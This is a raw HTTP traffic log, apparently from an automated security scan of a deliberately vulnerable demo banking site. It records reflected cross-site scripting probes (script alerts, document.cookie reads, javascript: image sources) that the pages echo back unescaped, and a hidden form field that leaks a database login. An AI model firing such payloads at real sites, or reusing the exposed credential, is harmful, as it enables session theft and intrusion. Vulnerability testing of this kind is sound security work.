HTTP/1.1 403 Access Forbidden
Server: Microsoft-IIS/5.0
Date: Thu, 04 Dec 2003 16:24:31 GMT
Content-Type: text/html
Content-Length: 172
<html><head><title>Directory Listing Denied</title></head>
<body><h1>Directory Listing Denied</h1>This Virtual Directory does not allow contents to be listed.</body></html>GET /plink.asp?a=>"><script>alert("XSS")</script>&c=12 HTTP/1.0
Referer: http://zero.webappsecurity.com:80/pindex.asp
Connection: Close
Host: zero.webappsecurity.com
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Thu, 04 Dec 2003 16:36:57 GMT
X-Powered-By: ASP.NET
Connection: Keep-Alive
Content-Length: 198
Content-Type: text/html
Cache-control: private
<html>
<body>
<P>The parameter "a" = >"><script>alert("XSS")</script></P>
<P>The parameter "c" = 12</P><br>
<a href="pindex.asp">Click here to return to index</a>
</body>
</html>
POST /testing/pcomboindex.asp HTTP/1.0
Referer: http://zero.webappsecurity.com:80/testing/
Content-Length: 56
Content-Type: application/x-www-form-urlencoded
Connection: Close
Host: zero.webappsecurity.com
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
cboPage=test@<script>alert(document.cookie)</script>.comHTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Thu, 04 Dec 2003 16:56:33 GMT
X-Powered-By: ASP.NET
Connection: Keep-Alive
Content-Length: 202
Content-Type: text/html
Cache-control: private
<html>
<body>
A user should never see this text<br>
this page is a redirect only page. The page that the user
selected was test@<script>alert(document.cookie)</script>.com
</body>
</html>
GET /rootlogin.asp HTTP/1.0
Referer: http://zero.webappsecurity.com:80/banklogin.asp?serviceName=FreebankCaastAccess&templateName=prod_sel.forte&source=Freebank&AD_REFERRING_URL=http://www.Freebank.com
Connection: Close
Host: zero.webappsecurity.com
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; CustomCookie=WebInspect
HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Thu, 04 Dec 2003 16:24:17 GMT
X-Powered-By: ASP.NET
Connection: Keep-Alive
Content-Length: 76
Content-Type: text/html
Cache-control: private
<html>
<body>
Invalid Data <br>Please try again.
</body>
</html>
GET /linking/link1/link2/link3/link4/link5/link6/index.htm HTTP/1.0
Referer: http://zero.webappsecurity.com:80/linking/link1/link2/link3/link4/link5/index.htm
Connection: Close
Host: zero.webappsecurity.com
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
X-Powered-By: ASP.NET
Date: Thu, 04 Dec 2003 16:24:23 GMT
Content-Type: text/html
Accept-Ranges: bytes
Last-Modified: Mon, 16 Jul 2001 03:47:10 GMT
ETag: "0b3b1fda9dc11:8f6"
Content-Length: 37
<A HREF="./link7/index.htm">Link7</A>GET /join.asp?name=&email=&surname=&house=&street=&address2=&town=&postcode=&country=&homephone=&mobilephone=test@<script>alert(document.cookie)</script>.com&msg=Please%2Bfill%2Bin%2Byour%2Bname HTTP/1.0
Referer: http://zero.webappsecurity.com:80/join1.asp
Connection: Close
Host: zero.webappsecurity.com
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Thu, 04 Dec 2003 16:54:40 GMT
X-Powered-By: ASP.NET
Connection: Keep-Alive
Content-Length: 4022
Content-Type: text/html
Cache-control: private
Set-Cookie: passes3=; path=/
Set-Cookie: passes2=; path=/
Set-Cookie: passes=; path=/
<html>
<html>
<head>
<title>Join Us</title>
<STYLE>
<!--
td {font-size: 9pt; color: #FEFCE0; font-family: verdana, arial}
A:link {text-decoration: none; color: #FFFFFF;}
A:visited {text-decoration: none; color: #FEFCE0;}
A:active {text-decoration: none; color: #FFFFFF;}
A:hover {text-decoration: none; color:#CCFFFF;}
-->
</STYLE>
</HEAD>
<body bgcolor="#000066" bgproperties=fixed topmargin="0" leftmargin="0" marginheight="0" marginwidth="0">
<td valign="top" align="center">
<table width="100%" border="0" cellpadding="5" cellspacing="0" align="center">
<tr><td height="32" bgcolor="#c000ff"><center><b>J O I N</b></center></td></tr>
<tr><td>
<table cellpadding="0" cellspacing="2" border="0" width="400" align="center">
<tr><td> </td></tr>
<tr><td> </td></tr>
<FORM ACTION="join1.asp" METHOD="get" NAME="TheForm">
<center>
<tr><td bgcolor=#c000ff colspan='2'><b><center>Please+fill+in+your+name</center></b></td></tr>
<tr><td align="center" bgcolor=#003388 colspan='2'> </td></tr>
<TR><TD align="right" bgcolor=#003388><B>Name:</B> </TD><TD bgcolor=#003388><INPUT NAME="Name" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Surname:</B> </TD><TD bgcolor=#003388><INPUT NAME="Surname" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>E-mail Address:</B> </TD><TD bgcolor=#003388><INPUT NAME="email" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Password:</B> </TD><TD bgcolor=#003388><INPUT NAME="Password" TYPE="password" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Confirm Password:</B> </TD><TD bgcolor=#003388><INPUT NAME="Confirm Password" TYPE="password" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>House Number:</B> </TD><TD bgcolor=#003388><INPUT NAME="house" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Street:</B> </TD><TD bgcolor=#003388><INPUT NAME="street" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Address Line 2:</B> </TD><TD bgcolor=#003388><INPUT NAME="Address2" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Town/City:</B> </TD><TD bgcolor=#003388><INPUT NAME="town" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Postcode:</B> </TD><TD bgcolor=#003388><INPUT NAME="Postcode" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Country:</B> </TD><TD bgcolor=#003388><INPUT NAME="Country" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Home Phone:</B> </TD><TD bgcolor=#003388><INPUT NAME="homephone" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Mobile Phone:</B> </TD><TD bgcolor=#003388><INPUT NAME="mobilephone" TYPE="text" VALUE="test@<script>alert(document.cookie)</script>.com"></INPUT></TD><TD></TD></TR>
<tr><td align="center" bgcolor=#003388 colspan='2'> </td></tr>
<tr><td align="center" bgcolor=#003388 colspan='2'><b><a href="javascript:document.forms[0].submit()">Join</a></b></td></tr>
<tr><td align="center" bgcolor=#003388 colspan='2'> </td></tr>
<tr><td align="center" bgcolor=#c000ff colspan='2'> </td></tr>
</center>
</Table>
</table>
</body>
</html>
GET /join.asp?name=&email=&surname=&house=&street=&address2=&town=&postcode=&country=&homephone=&mobilephone=&msg=>"'><img%20src="javascript:alert('XSS')"> HTTP/1.0
Referer: http://zero.webappsecurity.com:80/join1.asp
Connection: Close
Host: zero.webappsecurity.com
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Thu, 04 Dec 2003 16:55:39 GMT
X-Powered-By: ASP.NET
Connection: Keep-Alive
Content-Length: 3989
Content-Type: text/html
Cache-control: private
Set-Cookie: passes3=; path=/
Set-Cookie: passes2=; path=/
Set-Cookie: passes=; path=/
<html>
<html>
<head>
<title>Join Us</title>
<STYLE>
<!--
td {font-size: 9pt; color: #FEFCE0; font-family: verdana, arial}
A:link {text-decoration: none; color: #FFFFFF;}
A:visited {text-decoration: none; color: #FEFCE0;}
A:active {text-decoration: none; color: #FFFFFF;}
A:hover {text-decoration: none; color:#CCFFFF;}
-->
</STYLE>
</HEAD>
<body bgcolor="#000066" bgproperties=fixed topmargin="0" leftmargin="0" marginheight="0" marginwidth="0">
<td valign="top" align="center">
<table width="100%" border="0" cellpadding="5" cellspacing="0" align="center">
<tr><td height="32" bgcolor="#c000ff"><center><b>J O I N</b></center></td></tr>
<tr><td>
<table cellpadding="0" cellspacing="2" border="0" width="400" align="center">
<tr><td> </td></tr>
<tr><td> </td></tr>
<FORM ACTION="join1.asp" METHOD="get" NAME="TheForm">
<center>
<tr><td bgcolor=#c000ff colspan='2'><b><center>>"'><img src="javascript:alert('XSS')"></center></b></td></tr>
<tr><td align="center" bgcolor=#003388 colspan='2'> </td></tr>
<TR><TD align="right" bgcolor=#003388><B>Name:</B> </TD><TD bgcolor=#003388><INPUT NAME="Name" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Surname:</B> </TD><TD bgcolor=#003388><INPUT NAME="Surname" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>E-mail Address:</B> </TD><TD bgcolor=#003388><INPUT NAME="email" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Password:</B> </TD><TD bgcolor=#003388><INPUT NAME="Password" TYPE="password" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Confirm Password:</B> </TD><TD bgcolor=#003388><INPUT NAME="Confirm Password" TYPE="password" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>House Number:</B> </TD><TD bgcolor=#003388><INPUT NAME="house" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Street:</B> </TD><TD bgcolor=#003388><INPUT NAME="street" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Address Line 2:</B> </TD><TD bgcolor=#003388><INPUT NAME="Address2" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Town/City:</B> </TD><TD bgcolor=#003388><INPUT NAME="town" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Postcode:</B> </TD><TD bgcolor=#003388><INPUT NAME="Postcode" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Country:</B> </TD><TD bgcolor=#003388><INPUT NAME="Country" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Home Phone:</B> </TD><TD bgcolor=#003388><INPUT NAME="homephone" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Mobile Phone:</B> </TD><TD bgcolor=#003388><INPUT NAME="mobilephone" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<tr><td align="center" bgcolor=#003388 colspan='2'> </td></tr>
<tr><td align="center" bgcolor=#003388 colspan='2'><b><a href="javascript:document.forms[0].submit()">Join</a></b></td></tr>
<tr><td align="center" bgcolor=#003388 colspan='2'> </td></tr>
<tr><td align="center" bgcolor=#c000ff colspan='2'> </td></tr>
</center>
</Table>
</table>
</body>
</html>
GET /linking/link1/link2/link3/link4/link5/link6/link7/link8/link9/link10/index.htm HTTP/1.0
Referer: http://zero.webappsecurity.com:80/linking/link1/link2/link3/link4/link5/link6/link7/link8/link9/index.htm
Connection: Close
Host: zero.webappsecurity.com
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
X-Powered-By: ASP.NET
Date: Thu, 04 Dec 2003 16:24:24 GMT
Content-Type: text/html
Accept-Ranges: bytes
Last-Modified: Mon, 16 Jul 2001 03:47:11 GMT
ETag: "9c9758fea9dc11:8f6"
Content-Length: 39
<A HREF="./link11/index.htm">Link11</A>POST /pformresults.asp HTTP/1.0
Referer: http://zero.webappsecurity.com:80/pindex.asp.bak
Content-Length: 137
Content-Type: application/x-www-form-urlencoded
Connection: Close
Host: zero.webappsecurity.com
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; passes3=; passes2=; passes=; CustomCookie=WebInspect
txtHidden=This+was+hidden+from+the+user&dbConnectString=dbCCNumbers%3Buid%3Dsa%3Bpassword%3Dscoobydo&txtFirstName=Joe&txtLastName=SwinneyHTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Thu, 04 Dec 2003 16:41:48 GMT
X-Powered-By: ASP.NET
Connection: Keep-Alive
Content-Length: 352
Content-Type: text/html
Cache-control: private
<html>
<body>
<P>The parameter "txtFirstName" = Joe</P>
<P>The parameter "txtLastName" = Swinney</P><br>
<P>The <b>hidden</b> parameter "txtHidden" = Swinney</P><br>
<P>The <b>hidden</b> parameter "dbConnectString" = dbCCNumbers;uid=sa;password=scoobydo</P><br>
<a href="pindex.asp">Click here to return to index</a>
</body>
</html>
GET /_vti_cnf/document.URL; HTTP/1.0
Referer: http://zero.webappsecurity.com:80/_vti_cnf/
Connection: Close
Host: zero.webappsecurity.com
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; passes3=; passes2=; passes=; CustomCookie=WebInspect
HTTP/1.1 403 Access Forbidden
Server: Microsoft-IIS/5.0
Date: Thu, 04 Dec 2003 16:41:46 GMT
Content-Length: 4214
Content-Type: text/html
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
<html dir=ltr>
<head>
<style>
a:link {font:8pt/11pt verdana; color:FF0000}
a:visited {font:8pt/11pt verdana; color:#4e4e4e}
</style>
<META NAME="ROBOTS" CONTENT="NOINDEX">
<title>The page cannot be displayed</title>
<META HTTP-EQUIV="Content-Type" Content="text-html; charset=Windows-1252">
</head>
<script>
function Homepage(){
<!--
// in real bits, urls get returned to our script like this:
// res://shdocvw.dll/http_404.htm#http://www.DocURL.com/bar.htm
//For testing use DocURL = "res://shdocvw.dll/http_404.htm#https://www.microsoft.com/bar.htm"
DocURL=document.URL;
//this is where the http or https will be, as found by searching for :// but skipping the res://
protocolIndex=DocURL.indexOf("://",4);
//this finds the ending slash for the domain server
serverIndex=DocURL.indexOf("/",protocolIndex + 3);
//for the href, we need a valid URL to the domain. We search for the # symbol to find the begining
//of the true URL, and add 1 to skip it - this is the BeginURL value. We use serverIndex as the end marker.
//urlresult=DocURL.substring(protocolIndex - 4,serverIndex);
BeginURL=DocURL.indexOf("#",1) + 1;
urlresult=DocURL.substring(BeginURL,serverIndex);
//for display, we need to skip after http://, and go to the next slash
displayresult=DocURL.substring(protocolIndex + 3 ,serverIndex);
InsertElementAnchor(urlresult, displayresult);
}
function HtmlEncode(text)
{
return text.replace(/&/g, '&').replace(/'/g, '"').replace(/</g, '<').replace(/>/g, '>');
}
function TagAttrib(name, value)
{
return ' '+name+'="'+HtmlEncode(value)+'"';
}
function PrintTag(tagName, needCloseTag, attrib, inner){
document.write( '<' + tagName + attrib + '>' + HtmlEncode(inner) );
if (needCloseTag) document.write( '</' + tagName +'>' );
}
function URI(href)
{
IEVer = window.navigator.appVersion;
IEVer = IEVer.substr( IEVer.indexOf('MSIE') + 5, 3 );
return (IEVer.charAt(1)=='.' && IEVer >= '5.5') ?
encodeURI(href) :
escape(href).replace(/%3A/g, ':').replace(/%3B/g, ';');
}
function InsertElementAnchor(href, text)
{
PrintTag('A', true, TagAttrib('HREF', URI(href)), text);
}
//-->
</script>
<body bgcolor="FFFFFF">
<table width="410" cellpadding="3" cellspacing="5">
<tr>
<td align="left" valign="middle" width="360">
<h1 style="COLOR:000000; FONT: 13pt/15pt verdana"><!--Problem-->The page cannot be displayed</h1>
</td>
</tr>
<tr>
<td width="400" colspan="2">
<font style="COLOR:000000; FONT: 8pt/11pt verdana">There is a problem with the page you are trying to reach and it cannot be displayed.</font></td>
</tr>
<tr>
<td width="400" colspan="2">
<font style="COLOR:000000; FONT: 8pt/11pt verdana">
<hr color="#C0C0C0" noshade>
<p>Please try the following:</p>
<ul>
<li>Open the
<script>
<!--
if (!((window.navigator.userAgent.indexOf("MSIE") > 0) && (window.navigator.appVersion.charAt(0) == "2")))
{
Homepage();
}
//-->
</script>
home page, and then look for links to the information you want.</li>
<li>Click the <a href="javascript:location.reload()">
Refresh</a> button, or try again later.<br>
</li>
</ul>
<h2 style="font:8pt/11pt verdana; color:000000">HTTP 403.2 - Forbidden: Read Access Forbidden<br>
Internet Information Services</h2>
<hr color="#C0C0C0" noshade>
<p>Technical Information (for support personnel)</p>
<ul>
<p>
<li>Background:<br>
This error can be caused if there is no default page available and directory browsing has not been enabled for the directory, or if you are trying to display an HTML page that resides in a directory marked for Execute or Script permissions only.</p>
<p>
<li>More information:<br>
<a href="http://www.microsoft.com/ContentRedirect.asp?prd=iis&sbp=&pver=5.0&pid=&ID=403.2&cat=web&os=&over=&hrd=&Opt1=&Opt2=&Opt3=" target="_blank">Microsoft Support</a>
</li></p>
</ul>
</font></td>
</tr>
</table>
</body>
</html>
GET /p1.asp HTTP/1.0
Referer: http://zero.webappsecurity.com:80/pcomboindex.asp
Connection: Close
Host: zero.webappsecurity.com
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; CustomCookie=WebInspect
HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Thu, 04 Dec 2003 16:24:21 GMT
X-Powered-By: ASP.NET
Connection: Keep-Alive
Content-Length: 160
Content-Type: text/html
Cache-control: private
<html>
<body>
This is shown clicking the combo box labeled "Show Page One"<br>
<a href="pindex.asp">Click here to return to index</a>
</body>
</html>
GET /plink.asp?a=b&c=12 HTTP/1.0
Referer: http://zero.webappsecurity.com:80/pindex.asp
Connection: Close
Host: zero.webappsecurity.com
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; CustomCookie=WebInspect
HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Thu, 04 Dec 2003 16:24:18 GMT
X-Powered-By: ASP.NET
Connection: Keep-Alive
Content-Length: 167
Content-Type: text/html
Cache-control: private
<html>
<body>
<P>The parameter "a" = b</P>
<P>The parameter "c" = 12</P><br>
<a href="pindex.asp">Click here to return to index</a>
</body>
</html>
GET /join.asp?name=&email=&surname=&house=&street=&address2=&town=&postcode=&country=</textarea><script>alert('XSS')</script>&homephone=&mobilephone=&msg=Please%2Bfill%2Bin%2Byour%2Bname HTTP/1.0
Referer: http://zero.webappsecurity.com:80/join1.asp
Connection: Close
Host: zero.webappsecurity.com
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Thu, 04 Dec 2003 16:55:35 GMT
X-Powered-By: ASP.NET
Connection: Keep-Alive
Content-Length: 4014
Content-Type: text/html
Cache-control: private
Set-Cookie: passes3=; path=/
Set-Cookie: passes2=; path=/
Set-Cookie: passes=; path=/
<html>
<html>
<head>
<title>Join Us</title>
<STYLE>
<!--
td {font-size: 9pt; color: #FEFCE0; font-family: verdana, arial}
A:link {text-decoration: none; color: #FFFFFF;}
A:visited {text-decoration: none; color: #FEFCE0;}
A:active {text-decoration: none; color: #FFFFFF;}
A:hover {text-decoration: none; color:#CCFFFF;}
-->
</STYLE>
</HEAD>
<body bgcolor="#000066" bgproperties=fixed topmargin="0" leftmargin="0" marginheight="0" marginwidth="0">
<td valign="top" align="center">
<table width="100%" border="0" cellpadding="5" cellspacing="0" align="center">
<tr><td height="32" bgcolor="#c000ff"><center><b>J O I N</b></center></td></tr>
<tr><td>
<table cellpadding="0" cellspacing="2" border="0" width="400" align="center">
<tr><td> </td></tr>
<tr><td> </td></tr>
<FORM ACTION="join1.asp" METHOD="get" NAME="TheForm">
<center>
<tr><td bgcolor=#c000ff colspan='2'><b><center>Please+fill+in+your+name</center></b></td></tr>
<tr><td align="center" bgcolor=#003388 colspan='2'> </td></tr>
<TR><TD align="right" bgcolor=#003388><B>Name:</B> </TD><TD bgcolor=#003388><INPUT NAME="Name" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Surname:</B> </TD><TD bgcolor=#003388><INPUT NAME="Surname" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>E-mail Address:</B> </TD><TD bgcolor=#003388><INPUT NAME="email" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Password:</B> </TD><TD bgcolor=#003388><INPUT NAME="Password" TYPE="password" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Confirm Password:</B> </TD><TD bgcolor=#003388><INPUT NAME="Confirm Password" TYPE="password" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>House Number:</B> </TD><TD bgcolor=#003388><INPUT NAME="house" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Street:</B> </TD><TD bgcolor=#003388><INPUT NAME="street" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Address Line 2:</B> </TD><TD bgcolor=#003388><INPUT NAME="Address2" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Town/City:</B> </TD><TD bgcolor=#003388><INPUT NAME="town" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Postcode:</B> </TD><TD bgcolor=#003388><INPUT NAME="Postcode" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Country:</B> </TD><TD bgcolor=#003388><INPUT NAME="Country" TYPE="text" VALUE="</textarea><script>alert('XSS')</script>"></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Home Phone:</B> </TD><TD bgcolor=#003388><INPUT NAME="homephone" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Mobile Phone:</B> </TD><TD bgcolor=#003388><INPUT NAME="mobilephone" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<tr><td align="center" bgcolor=#003388 colspan='2'> </td></tr>
<tr><td align="center" bgcolor=#003388 colspan='2'><b><a href="javascript:document.forms[0].submit()">Join</a></b></td></tr>
<tr><td align="center" bgcolor=#003388 colspan='2'> </td></tr>
<tr><td align="center" bgcolor=#c000ff colspan='2'> </td></tr>
</center>
</Table>
</table>
</body>
</html>
GET /dan_o.dat HTTP/1.0
Connection: Close
Host: zero.webappsecurity.com
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
X-Powered-By: ASP.NET
Date: Thu, 04 Dec 2003 16:30:15 GMT
Content-Type: application/octet-stream
Accept-Ranges: bytes
Last-Modified: Mon, 16 Jul 2001 03:38:21 GMT
ETag: "aa2978c2a8dc11:8f6"
Content-Length: 9
ABS checkGET /errors/ HTTP/1.0
Connection: Close
Host: zero.webappsecurity.com
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
HTTP/1.1 403 Access Forbidden
Server: Microsoft-IIS/5.0
Date: Thu, 04 Dec 2003 16:25:47 GMT
Content-Type: text/html
Content-Length: 172
<html><head><title>Directory Listing Denied</title></head>
<body><h1>Directory Listing Denied</h1>This Virtual Directory does not allow contents to be listed.</body></html>GET /banklogin.asp?err=</textarea><script>alert('XSS')</script> HTTP/1.0
Referer: http://zero.webappsecurity.com:80/login1.asp
Connection: Close
Host: zero.webappsecurity.com
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Thu, 04 Dec 2003 16:37:05 GMT
X-Powered-By: ASP.NET
Connection: Keep-Alive
Content-Length: 4955
Content-Type: text/html
Cache-control: private
Set-Cookie: state=; path=/
Set-Cookie: userid=; path=/
Set-Cookie: username=; path=/
Set-Cookie: sessionid=; path=/
<HTML>
<HEAD>
<TITLE></TITLE>
</HEAD>
<BODY>
<TABLE BGCOLOR="#ffffff" STYLE="border: 3px solid black">
<TR>
<TD
STYLE="border-left: 12px solid #2E7AA3; border-top: 7px solid #2E7AA3"
HEIGHT="47" ROWSPAN="2" VALIGN="TOP"><IMG
SRC="/images/freebank-logo2.gif" ALIGN="LEFT" BORDER="0" WIDTH="150"
HEIGHT="50"><BR><BR></TD>
<TD STYLE="border-top: 7px solid #2E7AA3" WIDTH="571" HEIGHT="47"
VALIGN="TOP"> </TD>
<TD STYLE="border-top: 7px solid #2E7AA3" WIDTH="571"
VALIGN="TOP"> </TD>
</TR>
<TR>
<TD WIDTH="571" VALIGN="TOP" ROWSPAN="7" HEIGHT="49">
<TABLE>
<TR>
<TD BGCOLOR="#2E7AA3" STYLE="border: 1px solid black" WIDTH="258"
HEIGHT="217">
<FORM ACTION="login1.asp" METHOD="post">
<CENTER></textarea><script>alert('XSS')</script><br>Username:<BR><INPUT TYPE="text" NAME="login"
STYLE="border: 1px solid black; spacing: 0"><BR>Password:<BR><INPUT TYPE="password"
NAME="password" STYLE="border: 1px solid black; spacing: 0"><BR><INPUT
TYPE="radio" NAME="graphicOption" VALUE="minimum" CHECKED="CHECKED"><FONT
SIZE="-1">Minimum Graphics</FONT><BR><INPUT TYPE="radio" NAME="graphicOption"
VALUE="standard"><FONT SIZE="-1">Standard Graphics</FONT><BR><BR><INPUT
TYPE="submit" STYLE="border: 1px solid black"
VALUE=" Access Accounts "><BR></CENTER></FORM></TD>
<TD STYLE="border: 1px solid black" WIDTH="304" HEIGHT="217"
ROWSPAN="2"><IMG SRC="/images/lock.gif" WIDTH="304" HEIGHT="266"
BORDER="0"></TD>
</TR>
<TR>
